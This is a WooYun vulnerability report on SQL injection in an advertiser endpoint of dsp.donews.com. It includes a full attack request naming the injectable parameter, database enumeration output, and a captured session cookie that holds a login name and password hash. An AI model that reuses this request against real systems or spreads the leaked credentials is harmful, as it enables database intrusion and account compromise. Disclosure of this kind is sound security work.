
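Vulnerability summary

Bug ID: wooyun-2015-0136378

Title: DBA injection on an important Donews斗牛士 site

Vendor: Donews斗牛士

Author: 路人甲

Submitted: 2015-08-23 23:02

Fixed: 2015-08-28 23:04

Made public: 2015-08-28 23:04

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Vulnerability status: the vendor has been notified of the vulnerability but ignored it

Source: http://www.wooyun.org (for questions or help, contact [email protected])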



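Vulnerability details

Disclosure status:

2015-08-23: Details were sent to the vendor; waiting for the vendor to respond
2015-08-28: The vendor chose to ignore the vulnerability; details were released to the public

Brief description:

DBA injection

Detailed description: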



POST /advertiser/ajax_page/0 HTTP/1.1
Host: dsp.donews.com
Content-Length: 35
Accept: */*
Origin: http://dsp.donews.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/44.0.2403.107 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://dsp.donews.com/advertiser/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: pgv_pvi=2794665984; pgv_si=s7874044928;
BAIDU_DUP_lcr=http://www.wooyun.org/corps/page/40;
Hm_lvt_7cb6c297efb61b417d1027283fcccdb6=1440324052,1440324296,1440332101;
Hm_lpvt_7cb6c297efb61b417d1027283fcccdb6=1440332883;
PHPSESSID=o8c9eo5fsnc5jg4p86urha8rt4; ci_session=a%3A10%3A%7Bs%3A10%3A%22session_id
%22%3Bs%3A32%3A%221cda0480c2e44fbdf9543b25b7990bf7%22%3Bs%3A10%3A%22ip_address%22%3Bs
%3A11%3A%221.25.28.101%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A110%3A%22Mozilla%2F5.0+
%28Windows+NT+10.0%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome
%2F44.0.2403.107+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi
%3A1440333557%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A10%3A%22login_name
%22%3Bs%3A6%3A%22yxtest%22%3Bs%3A8%3A%22password%22%3Bs%3A32%3A
%22860b1d6552a8ed6d71c35b6de6ae0596%22%3Bs%3A7%3A%22dsp_uid%22%3Bs%3A2%3A%2221%22%3Bs
%3A9%3A%22flow_type%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22jzw%22%3Bs%3A0%3A%22%22%3B
%7D529c7a7b4cd65d09cec2f6374df8a737d8c8615f
sed=&adv_category_id=0&advertiser=1


The advertiser parameter is injectable!


available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] rtb


Proof of vulnerability:

Remediation:

Copyright notice: when reposting, please credit the source 路人甲@乌云


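Vulnerability response

Vendor response:

Severity: no impact, ignored by vendor

Ignored at: 2015-08-28 23:04

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None yet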